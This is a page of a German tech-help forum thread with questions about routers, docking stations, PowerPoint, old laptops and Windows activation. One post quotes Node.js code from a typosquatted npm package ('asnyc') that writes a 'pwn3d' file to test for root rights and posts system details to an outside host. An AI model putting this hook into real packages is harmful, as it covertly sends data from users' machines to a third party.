Du bist nicht eingeloggt! Möglicherweise kannst du deswegen nicht alles sehen.
  (Noch kein mods.de-Account? / Passwort vergessen?)
Zur Übersichtsseite
Hallo anonymer User.
Bitte logge dich ein
oder registriere dich!
 Moderiert von: Atomsk, statixx, Teh Wizard of Aiz, ]Maestro[


 Thema: Informatiker helfen PC-Neulingen
« vorherige 1 2 3 [4] 5 6 7 8 9 10 11 nächste »
erste ungelesene Seite | letzter Beitrag 
dantoX

dantoX
 
Zitat von -hi7.eM.hiGh-

Gehen tut es schon, könnte halt arsch langsam sein.

/insbesonders bei hohen rnd R&W zyklen.



Ich probiere es einfach aus. Für Duke Nukem 3D und Red Alert dürfte das kaum auffallen.
08.05.2019 12:15:17 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Rostbratwurst

AUP Rostbratwurst 15.09.2015
 
Zitat von heutenoch

 
Zitat von Slutti

Habe die dependency gefunden, die die text datei erstellt hat.
Wie gefickt bin ich?
läuft da seit Wochen n Webserver mit root rechten auf meinem Rechner? Haare zu Berge stehen?
 
Code:
const http = require('http');
const fs = require('fs')

let is_sudo = false;

const isSudo = () =>
  new Promise((resolve, reject) => {
    fs.writeFile("/pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){
      if(err){
        fs.writeFile("pwn3d.txt", "You are (fully) pwn3d due to a homobraphic error on your software dependencies", function(err){});
        resolve(false);
      } else {
        resolve(true);
      }
    })
})

const run = async() =>{
  const is_sudo = await isSudo()


  // console.log(await isSudo())

  let sender = "npm";
  let original_name = "async";
  let new_name = "asnyc";
  let version = process.version;

  let data = {
      "is_sudo": is_sudo? "True":"False",
      "sender": sender,
      "original_name": original_name,
      "new_name": new_name,
      "version": version
  }

  // data = JSON.stringify(data);
  var encoded = "";
  for(var prop in data) {
    encoded += prop + "=" + data[prop] + "&";
  }
  data = encoded.substring(0, encoded.length - 1) + "\n";

  var options = {
    host: 'homografo.junquera.xyz',
    port: 9999,
    path: '/',
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
      'Content-Length': data.length
    }
  }

  var req = http.request(options);

  req.write(data);

  req.end();

}

run()



Mein niedriger IT IQ sagt, dass der nur n log gesendet hat und sonst nix gemacht haben kann, oder? peinlich/erstaunt


Der Codeteil ist tatsächlich nur log senden method: 'POST',, der Code wartet auch drauf als sudo/root ausgeführt zu werden? Wie sehr du dich als gefickt betrachten kannst lässt sich schlecht sagen, aber besonders schlau hast du dich nicht angestellt Breites Grinsen



Also Ahnungsloser:
Wie kommt man zu sowas und wie kann man das rausfinden?
09.05.2019 13:51:49 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
heutenoch

X-Mas Leet
npm ist ein System um Code zur Verfügung zu stellen, das müsstest du aktiv installieren. Dann könntest dir darüber fremden Code, den man angucken und verstehen sollte bevor man ihn ausführt, für deine Projekte runterladen.
09.05.2019 14:23:33 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Rostbratwurst

AUP Rostbratwurst 15.09.2015


Danke
09.05.2019 14:32:55 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Lunovis

AUP Lunovis 27.11.2007
Ich glaube ich habe einen Scheiss gekauft, bin mir aber nicht sicher:

geplantes Ziel: Kabelmodem entmachten, Fritzbox mit 2 repeatern dahinter fürs heimnetz.

gekauft habe ich eine fritzbox 7530 und 2 fritzrepeater 1750
gemäss produktseite soll der router wan tauglich sein, aber an der Rückseite habe ich keine getrennte Buchse fürs WAN.

da ich aber das NAS und zwei Rechner sowie einen der Repeater über Kupfer verbinden, diese aber auch über die Fritzbox verwalten will, stellt sich mir nun die Frage, wie das vonstatten geht. Wenn ich das Kabelmodem einfach bei den anderen mit anhängen würde, wären diese gemäss meinem Verständnis dann über das Kabelmodem verwaltet und der neue Router nur fürs Wifigedöns zuständig.
andere Route wie der 7590 haben hinten eine WAN buchse, habe ich alo das falsche Teil gekauft?
09.05.2019 20:05:34 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
monischnucki

AUP monischnucki 16.08.2015
https://avm.de/produkte/fritzbox/fritzbox-7530/

Das kann die alles.

Wäre ne Kabelfritzbox nicht angebracht?
09.05.2019 20:11:11 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
red

AUP Redh3ad 11.10.2009
LAN1 ist deine WAN-Buchse, da muss das Kabelmodem ran. Wenn du noch vier weitere Geräte hast, wirst du wohl einen Switch kaufen müssen.
09.05.2019 20:18:50 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Lunovis

AUP Lunovis 27.11.2007
Da ich in der Schweiz bin und hier die Kabelmodems afaik nicht einfach so getauscht werden können, habe ich mich für die WAN variante entschieden, einfach, dass jeglicher Ärger mit dem Netz nicht mein Problem ist, war schon mühsam genug bis UPC mal geliefert hat.

Meine Frage mit dem WAN beantwortet die Produkteseite so eben nicht zufriedenstellend, da die Schachtel derzeit noch versiegelt ist, könnte ich das Teil aber auch einfacher zurückgeben..
09.05.2019 20:20:29 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Phillinger

AUP Phillinger 11.02.2013
 
Zitat von Lunovis

Ich glaube ich habe einen Scheiss gekauft, bin mir aber nicht sicher:

geplantes Ziel: Kabelmodem entmachten, Fritzbox mit 2 repeatern dahinter fürs heimnetz.

gekauft habe ich eine fritzbox 7530 und 2 fritzrepeater 1750
gemäss produktseite soll der router wan tauglich sein, aber an der Rückseite habe ich keine getrennte Buchse fürs WAN.

da ich aber das NAS und zwei Rechner sowie einen der Repeater über Kupfer verbinden, diese aber auch über die Fritzbox verwalten will, stellt sich mir nun die Frage, wie das vonstatten geht. Wenn ich das Kabelmodem einfach bei den anderen mit anhängen würde, wären diese gemäss meinem Verständnis dann über das Kabelmodem verwaltet und der neue Router nur fürs Wifigedöns zuständig.
andere Route wie der 7590 haben hinten eine WAN buchse, habe ich alo das falsche Teil gekauft?


Wenn du im Menü unter "Internet" als "Internetanbieter" im Dropdownmenü "vorhandener Zugang über LAN" auswählst, kannst du an LAN 1 das Kabelmodem anschließen. Danach müsstest du noch einstellen können, ob PPPoE oder Router-Kaskade.

/ Zumindest ist das bei meiner 7490 so. Würde stark vermuten, dass das bei deiner nicht anders ist.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von Phillinger am 09.05.2019 20:22]
09.05.2019 20:20:57 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Lunovis

AUP Lunovis 27.11.2007
 
Zitat von red

LAN1 ist deine WAN-Buchse, da muss das Kabelmodem ran. Wenn du noch vier weitere Geräte hast, wirst du wohl einen Switch kaufen müssen.


3 reichen gerade so. wenn das getrennt ist, passt das.

oder fällt euch ein rationaler Grund ein, stattdessen eher eine 7590 zu holen? Wände sind 40cm Sandstein, 5Ghz wird sowieso nicht viel durchgehen.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von Lunovis am 09.05.2019 20:22]
09.05.2019 20:21:30 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
red

AUP Redh3ad 11.10.2009
Pfeil
 
Zitat von Lunovis

Meine Frage mit dem WAN beantwortet die Produkteseite so eben nicht zufriedenstellend


Im Handbuch steht alles drin, kannst du auf der Webseite runterladen.
09.05.2019 20:45:05 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Lunovis

AUP Lunovis 27.11.2007
Hat alles geklappt, danke euch allen.
09.05.2019 22:38:58 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Orrin

Arctic
Ich habe ein HP Elitebook und die passende HP Docking Station dazu gekauft. Die Docking Station hat vier Wochen lang immer funktioniert, jetzt aber blinkt der Power Button durchgehend sobald ich den Laptop mit der Station verbunden habe und nichts wird mehr connected.
Habe deshalb dem Händler geschrieben, dass sie nicht mehr funktionieren würde. Der hat mir umgehend eine neue geschickt. Beim ersten Mal benutzen hat sie funktioniert aber seitdem gleiches Verhalten - blinken und keine Funktion sobald ich den Laptop darin einriegele.

Bei beiden Docking Stations gleiches Verhalten, sollte also am Laptop liegen? Jemand eine Idee dazu?
10.05.2019 8:35:05 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
RushHour

rushhour
unglaeubig gucken
Mein relativ neuer Laptop von HP unter Win10 hat ein extrem enervierendes Verhalten:

Gehe ich aus einer PP-Präsentation, die ich im Präsentationsmodus vortrage, mit ESC raus (was ich gewohnheitsmäßig so mache, wenn ich spontan andere Dateien zeigen will oder ein anderes Programm aufrufen möchte etc.), dann wechselt der Laptop vom Darstellungsmodus "Bildschirme duplizieren" in den Modus "Bildschirm erweitern".

Ich muß dann mühselig mit Win+P wieder auf duplizieren stellen, das wirkt extrem unprofessionell und bringt mich immer völlig aus dem Tritt.

Meine früheren Laptops (Lenovo) haben dieses Verhalten nicht gezeigt. Auf welcher Ebene könnte der Grund liegen (PP? Win10? native HP-Sonder-Tastenbelegung???), und wie kriege ich das Weg??? ESC soll nur aus dem Programm PP rausgehen, nicht den Bildschirmmodus ändern. Wütend
10.05.2019 9:36:01 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
Phillinger

AUP Phillinger 11.02.2013
Ist die ESC-Taste denn doppelt belegbar über irgendeine Fn-Taste oder steht da wirklich nur "ESC" drauf?

Kannst ja mal ne 0815-USB-Tastatur anschließen und schauen, was da die ESC-Taste auslöst. Dann kannst du zumindest PP ausschließen.
10.05.2019 11:46:07 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
kRush*

kRush*
 
Zitat von RushHour

wirkt extrem unprofessionell


Alt+Tab, etc. pp.?
10.05.2019 12:22:33 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
luke_skywalker

Leet
Mal probeweise in PowerPoint die folgende Option deaktivieren?

Datei -> Optionen -> Erweitert -> unter "Anzeigen": Haken raus bei Beim Präsentieren auf einem Laptop oder Tablet die Anzeige automatisch erweitern
10.05.2019 12:55:18 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
RushHour

rushhour
Mit externer Logitech-Tasta reproduzierbar.

Mit Lukes Tipp gelöst! Breites Grinsen

Danke!!!
10.05.2019 17:50:40 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
Ich bin gerade dabei einen alten EeePC wieder flott zu machen. Habe den Arbeitsspeicher verdoppelt (von 1GB auf 2GB - vielleicht verdoppel ich das auch nochmal, aber die 2GB hatte ich hier noch liegen) und eine SSD eingebaut.

Das Teil wurde damals mit Windows XP ausgeliefert und lief damit auch ziemlich gut.

Was macht man da heute drauf, wenn es keine Linux Distribution sein soll? Windows 7 lief auf der HDD richtig bescheiden. Läuft Windows 10 auf so einem alten, lahmen Teil besser? Vielleicht doch Windows 7 oder 8? Oder bekommt man irgendwo noch Windows XP her?

Das Ding soll ein "Lerncomputer" für meine Kinder werden. Da kommen ein paar alte Spiele drauf und zum gelegentlichen Surfen im Internet wird er auch genutzt.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von dantoX am 10.05.2019 19:20]
10.05.2019 19:15:10 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
red

AUP Redh3ad 11.10.2009
verschmitzt lachen
 
Zitat von dantoX

Was macht man da heute drauf, wenn es keine Linux Distribution sein soll?


FreeBSD
10.05.2019 19:20:25 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
Wegen der Spiele Klassiker und einiger andere Dinge soll es ein Windows werden.

Auf red, hau mal eine Empfehlung raus.

Ich guck mir jetzt mal an, wie Windows 10 läuft.
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von dantoX am 10.05.2019 19:24]
10.05.2019 19:23:24 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
heutenoch

X-Mas Leet
 
Zitat von dantoX

Ich bin gerade dabei einen alten EeePC wieder flott zu machen. Habe den Arbeitsspeicher verdoppelt (von 1GB auf 2GB - vielleicht verdoppel ich das auch nochmal, aber die 2GB hatte ich hier noch liegen) und eine SSD eingebaut.

Das Teil wurde damals mit Windows XP ausgeliefert und lief damit auch ziemlich gut.

Was macht man da heute drauf, wenn es keine Linux Distribution sein soll? Windows 7 lief auf der HDD richtig bescheiden. Läuft Windows 10 auf so einem alten, lahmen Teil besser? Vielleicht doch Windows 7 oder 8? Oder bekommt man irgendwo noch Windows XP her?

Das Ding soll ein "Lerncomputer" für meine Kinder werden. Da kommen ein paar alte Spiele drauf und zum gelegentlichen Surfen im Internet wird er auch genutzt.


Mehr RAM geht wahrscheinlich gar nicht und wenn das Teil irgendwie ins Netz soll dann wenigstens Win7 solange es noch Updates gibt.. unter XP laufen nicht mal mehr aktuelle Browser afair. Für ein paar Kröten eine SSD ist zwar halb verschwendet, aber dann würde Win7 wahrscheinlich erträglich.
10.05.2019 19:28:03 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
red

AUP Redh3ad 11.10.2009
verschmitzt lachen
 
Zitat von dantoX

Wegen der Spiele Klassiker und einiger andere Dinge soll es ein Windows werden.


Die Spieleklassiker, die auf der Möhre noch laufen, brauchen eh DOSBox oder ScummVM und die gibt's auch für Linux.

Für den Rest halt Wine.
10.05.2019 19:31:50 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
 
Zitat von red

 
Zitat von dantoX

Wegen der Spiele Klassiker und einiger andere Dinge soll es ein Windows werden.


Die Spieleklassiker, die auf der Möhre noch laufen, brauchen eh DOSBox oder ScummVM und die gibt's auch für Linux.

Für den Rest halt Wine.



Überzeugt!

Windows 10 läuft einfach beschissen. War ja zu erwarten.

Ich hätte zwar gern ein Windows drauf laufen gehabt, damit die Kids sich auch mit Windows auseinandersetzen. Aber das wird erstmal nix.

Welche Linux Distribution kannst Du empfehlen?
11.05.2019 18:45:44 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
red

AUP Redh3ad 11.10.2009
Irgendein Ubuntu-Flavour ist vermutlich der beste Einstieg. Wegen der Hardware würde ich wohl Lubuntu nehmen.
12.05.2019 9:33:39 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
[RPD]-Biohazard

Arctic
missmutig gucken
Moin pot.

Hatte schonmal jemand das Problem dass Windows 7 nach Jahren aufeinmal meint

Die Echtheit dieser Windows-Kopie wurde nicht bestätigt

Habn Acer Notebook und bis jetzt nie Porbleme gehabt. Wurde da irgendwas zerschossen?

Slui spuckt nur n Fehler aus. Code0x80070002
Das System kann die angegebene Datei nicht finden.

Suuuuper
12.05.2019 11:16:51 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
...
 
Zitat von red

Irgendein Ubuntu-Flavour ist vermutlich der beste Einstieg. Wegen der Hardware würde ich wohl Lubuntu nehmen.



Ok, danke!

Hab mir gerade die Iso gezogen. Mit dem LiLi USB Creator erstelle ich mir jetzt einen Bootstick, richtig? Oder wird dann dadraus ein Livelinux, dass ich gar nicht dauerhaft installieren kann?

Ich hab bisher nie ein Linux installiert - nur Livelinux genutzt zur Datenrettung.

Edit: Ahhh ... man wird direkt gefragt bevor es los geht!

Sehr schön
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von dantoX am 12.05.2019 11:42]
12.05.2019 11:40:00 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
dantoX

dantoX
Wie kann ich denn unter Lubuntu etwas installieren?

Ich brauch mal jemanden, der mich kurz an die Hand nimmt und mir erklärt, wie ich wine auf Lubuntu installiert bekomme und wie ich es dann schließlich zum Laufen bekommen / nutze.
12.05.2019 14:48:44 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
hitmiccs

AUP hitmiccs 21.09.2009
Ich schätze dass Lubuntu auch einen Paketmanager/Paketverwaltung hat, such mal danach. Dort suchst du wiederum nach Wine, machst nen Haken dran und klickst dann den Button der am meisten nach Installieren aussieht Augenzwinkern
12.05.2019 14:52:13 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
[RPD]-Biohazard

Arctic
missmutig gucken
 
Zitat von [RPD]-Biohazard

Moin pot.

Hatte schonmal jemand das Problem dass Windows 7 nach Jahren aufeinmal meint

Die Echtheit dieser Windows-Kopie wurde nicht bestätigt

Habn Acer Notebook und bis jetzt nie Porbleme gehabt. Wurde da irgendwas zerschossen?

Slui spuckt nur n Fehler aus. Code0x80070002
Das System kann die angegebene Datei nicht finden.

Suuuuper








WINDOWS Kopf gegen die Wand schlagen

WTF is this shit?
[Dieser Beitrag wurde 1 mal editiert; zum letzten Mal von [RPD]-Biohazard am 12.05.2019 16:46]
12.05.2019 16:46:23 Zum letzten Beitrag
[ zitieren ] [ pm ] [ diesen post melden ]
 Thema: Informatiker helfen PC-Neulingen
« vorherige 1 2 3 [4] 5 6 7 8 9 10 11 nächste »

mods.de - Forum » Public Offtopic » 

Hop to:  

Mod-Aktionen:
25.04.2019 23:15:11 Atomsk hat diesem Thread das ModTag 'informatiker' angehängt.

| tech | impressum